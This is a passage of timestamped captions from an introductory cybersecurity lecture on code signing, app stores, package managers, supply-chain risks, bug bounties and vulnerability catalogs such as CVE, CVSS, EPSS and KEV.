the internet 1989 01:44:21,370 --> 01:44:23,030 not have access to it. 1990 01:44:23,030 --> 01:44:26,680 So maybe the probability that that software not only has mistakes, 1991 01:44:26,680 --> 01:44:30,230 but those mistakes are exploited, is perhaps lower. 1992 01:44:30,230 --> 01:44:32,500 And so this is perhaps more of a debate. 1993 01:44:32,500 --> 01:44:34,750 And you yourselves as you consider this might 1994 01:44:34,750 --> 01:44:37,780 have to acquire your own opinions on open source versus closed source. 1995 01:44:37,780 --> 01:44:40,000 But another argument in favor of open source 1996 01:44:40,000 --> 01:44:42,550 is often that with so many people around the world 1997 01:44:42,550 --> 01:44:46,750 having eyes on software, perhaps that actually increases the probability 1998 01:44:46,750 --> 01:44:51,430 that we will detect bugs or detect potential exploits because so many more 1999 01:44:51,430 --> 01:44:54,543 smart people are looking at it and therefore weighing in. 2000 01:44:54,543 --> 01:44:57,460 The downside, of course, if one of those smart people is an adversary, 2001 01:44:57,460 --> 01:45:00,730 they find it and don't tell anyone, then we're back to a problem 2002 01:45:00,730 --> 01:45:04,510 from a previous class, wherein we discussed those zero-day attacks. 2003 01:45:04,510 --> 01:45:07,780 But this is one way, one mental model you might have, 2004 01:45:07,780 --> 01:45:11,320 for evaluating just how secure your own software might 2005 01:45:11,320 --> 01:45:14,950 be that you're either using as a user or developing as a company. 2006 01:45:14,950 --> 01:45:18,580 What's another way that you might gain some assurance that the software you're 2007 01:45:18,580 --> 01:45:23,920 installing and using is not infected with some form of vulnerability 2008 01:45:23,920 --> 01:45:26,560 or malicious intent? 2009 01:45:26,560 --> 01:45:28,600 Well, you could download all of the software 2010 01:45:28,600 --> 01:45:32,860 that you use only from an approved app store, be it in the world of iPhones 2011 01:45:32,860 --> 01:45:35,980 or Android devices, macOS, Windows, or the like, 2012 01:45:35,980 --> 01:45:39,100 whereby you have some other entity, like a Google and Apple 2013 01:45:39,100 --> 01:45:45,190 or a Microsoft, a big company that is at least analyzing the applications that 2014 01:45:45,190 --> 01:45:49,120 are being uploaded to these app stores before they're 2015 01:45:49,120 --> 01:45:51,370 allowed to be distributed to people like you and me. 2016 01:45:51,370 --> 01:45:54,245 Now, that's not to say that Apple and Microsoft and Googles or others 2017 01:45:54,245 --> 01:45:54,850 are perfect. 2018 01:45:54,850 --> 01:45:59,110 There have absolutely been many cases where even applications in these app 2019 01:45:59,110 --> 01:46:03,430 stores has some malicious feature that they only realize after the fact. 2020 01:46:03,430 --> 01:46:07,330 But again, it's probably increasing the probability 2021 01:46:07,330 --> 01:46:09,880 that some smart people or automated software 2022 01:46:09,880 --> 01:46:13,960 is going to detect those things first before it even reaches your device. 2023 01:46:13,960 --> 01:46:17,350 And therefore, it makes it harder for the adversary-- raises the bar, 2024 01:46:17,350 --> 01:46:20,320 raises the cost, raises the risk to them to even get 2025 01:46:20,320 --> 01:46:21,740 something like that distributed. 2026 01:46:21,740 --> 01:46:22,730 So what does this mean? 2027 01:46:22,730 --> 01:46:24,772 Well, when you install software in your computer, 2028 01:46:24,772 --> 01:46:27,610 perhaps you should get it only from Microsoft or Google or Apple 2029 01:46:27,610 --> 01:46:31,000 and not from some random website, and certainly not from some random email 2030 01:46:31,000 --> 01:46:34,480 that someone sent you with a link to download some piece of software. 2031 01:46:34,480 --> 01:46:36,320 Now, that's not always going to be the case. 2032 01:46:36,320 --> 01:46:40,210 And particularly, if you yourself are an aspiring programmer, a software 2033 01:46:40,210 --> 01:46:43,300 developer, you might need to be in the habit of installing 2034 01:46:43,300 --> 01:46:46,382 sort of "unauthorized software" for which you might have 2035 01:46:46,382 --> 01:46:49,090 to jump through some hoops and change some settings in your phone 2036 01:46:49,090 --> 01:46:54,310 or in your Mac or PC to even allow you to install unauthorized software if you 2037 01:46:54,310 --> 01:46:55,360 know what you're doing. 2038 01:46:55,360 --> 01:46:59,860 But these kinds of mechanisms, even though they create dissatisfaction 2039 01:46:59,860 --> 01:47:02,110 with this idea of a walled garden, whereby 2040 01:47:02,110 --> 01:47:04,510 you need some corporate entity's permission 2041 01:47:04,510 --> 01:47:08,960 just to distribute your software-- they do serve a good purpose as well. 2042 01:47:08,960 --> 01:47:11,740 So there, too, you might fall on one side or the other 2043 01:47:11,740 --> 01:47:14,080 of that sort of argument too. 2044 01:47:14,080 --> 01:47:19,150 Now, how do those app stores enforce the fact 2045 01:47:19,150 --> 01:47:23,660 that you can only install the software if it is in the app store itself? 2046 01:47:23,660 --> 01:47:27,490 Well, it turns out we can revisit some of our primitives from past classes, 2047 01:47:27,490 --> 01:47:31,270 whereby we talked about encryption and also hashing 2048 01:47:31,270 --> 01:47:35,500 and also digital signatures, the latter of two are particularly germane here. 2049 01:47:35,500 --> 01:47:39,910 It turns out that cryptography really is the solution to a lot of the world's 2050 01:47:39,910 --> 01:47:42,250 current problems when it comes to cybersecurity 2051 01:47:42,250 --> 01:47:46,570 if we use these primitives, hashing, encryption, and digital signing 2052 01:47:46,570 --> 01:47:48,740 as building blocks to solutions. 2053 01:47:48,740 --> 01:47:52,180 So, for instance, when you develop a piece of software, 2054 01:47:52,180 --> 01:47:55,510 or some company does this for you, and they upload their software 2055 01:47:55,510 --> 01:47:58,750 to Apple or Google or Microsoft for distribution, 2056 01:47:58,750 --> 01:48:00,790 what are those companies doing? 2057 01:48:00,790 --> 01:48:04,510 Well, first, you, as the author of the software, 2058 01:48:04,510 --> 01:48:08,360 are first using your own public and private key, 2059 01:48:08,360 --> 01:48:09,910 which you came up with in advance. 2060 01:48:09,910 --> 01:48:14,500 And you are running your software through some special function 2061 01:48:14,500 --> 01:48:16,940 or algorithm and getting back a hash thereof. 2062 01:48:16,940 --> 01:48:20,240 Again, a hash is this fixed length representation of your software. 2063 01:48:20,240 --> 01:48:22,280 So even if you wrote a really big program, 2064 01:48:22,280 --> 01:48:26,800 you have this unique identifier, or highly probably unique 2065 01:48:26,800 --> 01:48:29,060 identifier, called a hash. 2066 01:48:29,060 --> 01:48:32,860 And what you can then do with that hash is use your private key 2067 01:48:32,860 --> 01:48:37,270 and sign that hash, giving you a digital signature. 2068 01:48:37,270 --> 01:48:41,680 That signature can be verified by Google or Microsoft or Apple as being, 2069 01:48:41,680 --> 01:48:44,920 OK, I know that David Malan wrote this software because I 2070 01:48:44,920 --> 01:48:47,200 know that only he has that private key. 2071 01:48:47,200 --> 01:48:50,170 And so long as I, David Malan, registered my public key 2072 01:48:50,170 --> 01:48:52,240 with Apple or Google or Microsoft in advance, 2073 01:48:52,240 --> 01:48:55,060 they can assume that, OK, this new version 2074 01:48:55,060 --> 01:48:58,120 of the software or this new program came from David Malan 2075 01:48:58,120 --> 01:49:01,960 and not from some random person on the internet pretending to be David Malan. 2076 01:49:01,960 --> 01:49:07,810 Conversely, what Google and Microsoft and Apple and others 2077 01:49:07,810 --> 01:49:12,420 can do is the same thing-- once you have uploaded your software to their app 2078 01:49:12,420 --> 01:49:18,570 store, they can ensure that they run the software through the same function, 2079 01:49:18,570 --> 01:49:22,140 getting back a hash thereof, a unique representation thereof. 2080 01:49:22,140 --> 01:49:26,220 They can use their own private key from their own app store 2081 01:49:26,220 --> 01:49:30,480 to take that hash as input and produce a digital signature, this time signed 2082 01:49:30,480 --> 01:49:34,530 by Apple or Microsoft or Google or whoever else is running the app store. 2083 01:49:34,530 --> 01:49:40,440 And then when you or I install that software on our Mac and our PC, 2084 01:49:40,440 --> 01:49:43,920 or on our phones, our phones and devices can 2085 01:49:43,920 --> 01:49:48,030 ensure that any software you and I are installing on our device 2086 01:49:48,030 --> 01:49:51,840 was digitally signed by that app store, by Google 2087 01:49:51,840 --> 01:49:55,300 or Microsoft or Apple or the like. 2088 01:49:55,300 --> 01:49:59,010 So again, just by using this basic building block of digital signatures 2089 01:49:59,010 --> 01:50:02,160 and hashing in this case, you can both attest in one direction 2090 01:50:02,160 --> 01:50:04,170 that I am David Malan. 2091 01:50:04,170 --> 01:50:06,330 Trust my software is written from me. 2092 01:50:06,330 --> 01:50:09,070 Conversely, when people install my software, 2093 01:50:09,070 --> 01:50:11,890 they can trust if Apple or Google or Microsoft or others 2094 01:50:11,890 --> 01:50:15,710 trust that software that they should indeed be allowed to double-click it. 2095 01:50:15,710 --> 01:50:19,090 And it's only when you download some unauthorized software, 2096 01:50:19,090 --> 01:50:22,870 from the internet, typically, that you get often nowadays on your screen 2097 01:50:22,870 --> 01:50:25,420 an alert saying, this has not been signed, 2098 01:50:25,420 --> 01:50:29,230 or this is from an unauthorized third-party developer or the like 2099 01:50:29,230 --> 01:50:32,620 if they're not playing nicely in this same ecosystem. 2100 01:50:32,620 --> 01:50:35,750 But again, digital signatures take us a long way there. 2101 01:50:35,750 --> 01:50:39,170 So another mechanism you can consider, which is similar in spirit 2102 01:50:39,170 --> 01:50:42,550 but typically terminology that's used in the world of Linux computers 2103 01:50:42,550 --> 01:50:45,400 or similar, are package managers. 2104 01:50:45,400 --> 01:50:47,680 And different programming languages also come 2105 01:50:47,680 --> 01:50:50,260 with an ecosystem of libraries, third-party code, 2106 01:50:50,260 --> 01:50:54,220 that people write and they make freely available, often as open source. 2107 01:50:54,220 --> 01:50:57,310 But there's standard ways by which these package managers 2108 01:50:57,310 --> 01:51:02,020 can let you and me install the software on our own Macs, PCs, phones, 2109 01:51:02,020 --> 01:51:02,710 or the like. 2110 01:51:02,710 --> 01:51:08,890 And it's using tools like pip for Python, gem for Ruby, npm for Node.js, 2111 01:51:08,890 --> 01:51:11,350 and there's others as well-- apt for Linux. 2112 01:51:11,350 --> 01:51:13,690 These package managers, though, typically adopt 2113 01:51:13,690 --> 01:51:18,310 a very similar mechanism, whereby they are digitally signing these packages so 2114 01:51:18,310 --> 01:51:23,080 that you and I can have our computers verify those signatures before they're 2115 01:51:23,080 --> 01:51:24,760 actually allowed to be installed. 2116 01:51:24,760 --> 01:51:28,430 And in general, this involves operating systems as well. 2117 01:51:28,430 --> 01:51:31,360 The operating systems that you and I are running nowadays, 2118 01:51:31,360 --> 01:51:34,720 at least if you stayed current and are in the habit of automatic updates 2119 01:51:34,720 --> 01:51:36,490 or frequent manual updates-- 2120 01:51:36,490 --> 01:51:40,270 odds are today's more modern operating systems are increasingly 2121 01:51:40,270 --> 01:51:44,390 building in native support for these kinds of checks. 2122 01:51:44,390 --> 01:51:47,650 Downside is it's getting a little more difficult, a little more annoying, 2123 01:51:47,650 --> 01:51:50,410 to install third-party software on our devices. 2124 01:51:50,410 --> 01:51:53,560 But the upside is that if you trust these app 2125 01:51:53,560 --> 01:51:57,100 stores, these package managers, then, by transitivity, 2126 01:51:57,100 --> 01:52:00,970 you can with higher probability trust the software being 2127 01:52:00,970 --> 01:52:02,230 distributed there too. 2128 01:52:02,230 --> 01:52:05,320 Now this too, though, is not fail safe, and it has often 2129 01:52:05,320 --> 01:52:08,500 happened that even when software has been uploaded to these app stores 2130 01:52:08,500 --> 01:52:11,050 or package managers and made available to folks, 2131 01:52:11,050 --> 01:52:15,220 and version 1 might be perfectly safe, version 2 might be perfectly safe, 2132 01:52:15,220 --> 01:52:19,900 version 3 might be malicious for some reason. 2133 01:52:19,900 --> 01:52:24,848 Maybe the developer finally decided to do what their intention was all along. 2134 01:52:24,848 --> 01:52:26,890 Maybe the developer-- and this has happened too-- 2135 01:52:26,890 --> 01:52:29,920 sold their software to someone else, and the third party now 2136 01:52:29,920 --> 01:52:32,080 is adding ads or something malicious to it. 2137 01:52:32,080 --> 01:52:34,930 Or someone has hacked their computer or account 2138 01:52:34,930 --> 01:52:37,990 and gained access to their private key and not just their public key 2139 01:52:37,990 --> 01:52:39,800 and therefore are masquerading as them. 2140 01:52:39,800 --> 01:52:44,200 So even now, you can't necessarily trust the software 2141 01:52:44,200 --> 01:52:45,547 you're running on your computer. 2142 01:52:45,547 --> 01:52:48,130 But again, that brings us back to some of our earliest lessons 2143 01:52:48,130 --> 01:52:50,213 in the class, where what we're really trying to do 2144 01:52:50,213 --> 01:52:53,170 is raise the bar to the adversary, increase the cost, 2145 01:52:53,170 --> 01:52:56,260 increase the risk to them, and conversely decrease 2146 01:52:56,260 --> 01:53:00,220 the probability to us that any one of these pieces of software 2147 01:53:00,220 --> 01:53:02,830 might actually be malicious. 2148 01:53:02,830 --> 01:53:06,700 Now, there are models that the world has been experimenting with over time 2149 01:53:06,700 --> 01:53:10,270 to try to figure out how best to reduce these probabilities further. 2150 01:53:10,270 --> 01:53:14,740 And there's this notion of bug bounties, whereby some companies will actually 2151 01:53:14,740 --> 01:53:17,980 steer in to the reality that there are people out there with the skills, 2152 01:53:17,980 --> 01:53:22,900 not only to do malicious things with their software, but also good things 2153 01:53:22,900 --> 01:53:23,660 as well. 2154 01:53:23,660 --> 01:53:29,560 For instance, people who might very well want to try to find bugs in software, 2155 01:53:29,560 --> 01:53:31,990 particularly ones that relate to security-- 2156 01:53:31,990 --> 01:53:36,100 if they know that the company in whose software they're discovering these bugs 2157 01:53:36,100 --> 01:53:38,990 is willing to pay for it-- and not in a ransom sense, 2158 01:53:38,990 --> 01:53:44,410 not in a malicious ransom sense, but in a bounty sense, whereby there tends 2159 01:53:44,410 --> 01:53:47,290 to be this marketplace for some companies and some products, 2160 01:53:47,290 --> 01:53:50,080 whereby if you do discover a bug in their software, 2161 01:53:50,080 --> 01:53:54,140 and you disclose it only to the designers of the software, 2162 01:53:54,140 --> 01:53:57,340 at least during some window of time before you tell the world about it, 2163 01:53:57,340 --> 01:53:58,540 they will pay you. 2164 01:53:58,540 --> 01:54:02,320 So that once they can therefore fix the bug then 2165 01:54:02,320 --> 01:54:05,050 pay out because it's a net positive for everyone. 2166 01:54:05,050 --> 01:54:05,560 Win-win. 2167 01:54:05,560 --> 01:54:06,340 You have benefited. 2168 01:54:06,340 --> 01:54:07,173 They have benefited. 2169 01:54:07,173 --> 01:54:09,280 And hopefully, no adversaries have found it first. 2170 01:54:09,280 --> 01:54:11,200 And depending on the severity of these bugs, 2171 01:54:11,200 --> 01:54:14,750 you might get paid more or less based on the same. 2172 01:54:14,750 --> 01:54:17,260 And so the idea here of these bug bounty programs 2173 01:54:17,260 --> 01:54:21,220 is try to leverage the collective intelligence and technical skill 2174 01:54:21,220 --> 01:54:23,590 of people who, frankly, without these programs, 2175 01:54:23,590 --> 01:54:27,400 maybe would be using their skills for evil and trying to hack these systems 2176 01:54:27,400 --> 01:54:29,140 and monetize them through ransomware. 2177 01:54:29,140 --> 01:54:33,700 But perhaps we could channel those funds instead toward paying people 2178 01:54:33,700 --> 01:54:35,180 to do this kind of work. 2179 01:54:35,180 --> 01:54:38,920 So this too is something to consider not so much as a user using software 2180 01:54:38,920 --> 01:54:42,980 but perhaps a company developing software. 2181 01:54:42,980 --> 01:54:44,980 So where can you learn more? 2182 01:54:44,980 --> 01:54:46,900 And what has the world come up with to keep 2183 01:54:46,900 --> 01:54:49,060 track of all of these possible threats? 2184 01:54:49,060 --> 01:54:52,420 And what we focused on today really are representative attacks 2185 01:54:52,420 --> 01:54:54,370 using some languages and technologies that 2186 01:54:54,370 --> 01:54:56,740 are quite omnipresent and fairly accessible, 2187 01:54:56,740 --> 01:54:58,580 at least at the level we've explained them. 2188 01:54:58,580 --> 01:55:02,557 But it turns out that there is a whole inventory of vulnerabilities 2189 01:55:02,557 --> 01:55:05,140 that have been detected over the years, Common Vulnerabilities 2190 01:55:05,140 --> 01:55:09,290 and Exposures, or CVEs, such that a lot of the kinds of attacks 2191 01:55:09,290 --> 01:55:12,050 we've been talking about today and, more specifically, 2192 01:55:12,050 --> 01:55:15,500 bugs and flaws in specific software and versions 2193 01:55:15,500 --> 01:55:19,640 thereof are often assigned a unique identifier, a CVE 2194 01:55:19,640 --> 01:55:23,480 number that system administrators, companies, and even end users 2195 01:55:23,480 --> 01:55:27,320 can keep track of to make sure they are always current with the latest threats 2196 01:55:27,320 --> 01:55:28,010 out there. 2197 01:55:28,010 --> 01:55:32,120 There is also a Common Vulnerability Scoring System, or CVSS, 2198 01:55:32,120 --> 01:55:34,850 which is a standardized way of assigning a score 2199 01:55:34,850 --> 01:55:36,800 to the severity of a vulnerability. 2200 01:55:36,800 --> 01:55:37,850 Is it a big deal? 2201 01:55:37,850 --> 01:55:39,500 Or is it not so much a big deal? 2202 01:55:39,500 --> 01:55:41,510 It might still be a vulnerability, a bug. 2203 01:55:41,510 --> 01:55:43,350 But is it that problematic? 2204 01:55:43,350 --> 01:55:45,920 And so there's this scale so that you can prioritize things-- 2205 01:55:45,920 --> 01:55:49,550 for instance, given limited resources or time, which of the bugs 2206 01:55:49,550 --> 01:55:52,760 you should be fixing, which of the software you should be updating, 2207 01:55:52,760 --> 01:55:54,680 or maybe which of the software you should not 2208 01:55:54,680 --> 01:55:58,880 be using, at least while it's vulnerable to something that's highly severe. 2209 01:55:58,880 --> 01:56:01,790 There's an Exploit Prediction Scoring System out there, 2210 01:56:01,790 --> 01:56:05,690 EPSS, which refers to what do people in the real world 2211 01:56:05,690 --> 01:56:11,060 think the probability is that this particular bug or mistake in software 2212 01:56:11,060 --> 01:56:12,710 will be exploited is. 2213 01:56:12,710 --> 01:56:16,550 And this then might give you a sense of just how problematic it is. 2214 01:56:16,550 --> 01:56:18,890 Even if there's something very severe, is it more 2215 01:56:18,890 --> 01:56:21,680 of a hypothetical threat or an actual threat, something 2216 01:56:21,680 --> 01:56:25,520 that IT people might indeed take into account when designing 2217 01:56:25,520 --> 01:56:27,290 how to respond to some system. 2218 01:56:27,290 --> 01:56:31,610 And then there's a Known Exploited Vulnerability catalog, KEV, 2219 01:56:31,610 --> 01:56:34,220 which refers to all of these kinds of bugs 2220 01:56:34,220 --> 01:56:36,800 that are known to have been exploited. 2221 01:56:36,800 --> 01:56:39,200 So suffice it to say, here, we're now seeing 2222 01:56:39,200 --> 01:56:42,650 evidence of just how big of a world, how big of a space 2223 01:56:42,650 --> 01:56:46,508 cybersecurity is that we have all of these lists and taxonomies for keeping 2224 01:56:46,508 --> 01:56:49,550 track of things, because if you're feeling a little overwhelmed with just 2225 01:56:49,550 --> 01:56:52,534 some of the concepts, imagine just how many hundreds, 2226 01:56:52,534 --> 01:56:56,720 thousands of actual threats and vulnerabilities 2227 01:56:56,720 --> 01:56:59,180 there are in the actual wild. 2228 01:56:59,180 --> 01:57:01,280 All right, so that's a whole lot of threats 2229 01:57:01,280 --> 01:57:04,730 to the security of your software, whether you're using it as a user 2230 01:57:04,730 --> 01:57:06,410 or writing it as a developer. 2231 01:57:06,410 --> 01:57:08,840 But hopefully, by way of today's examples 2232 01:57:08,840 --> 01:57:12,410 of how software works, how adversaries can take advantage of it, 2233 01:57:12,410 --> 01:57:15,800 and how you can defend against it, you have a much better sense 2234 01:57:15,800 --> 01:57:17,840 of how to manage those threats. 2235 01:57:17,840 --> 01:57:21,890 Up ahead is how we might now preserve our own privacy. 2236 01:57:21,890 --> 01:57:24,700 More on that next time. 2237 01:57:24,700 --> 01:57:26,000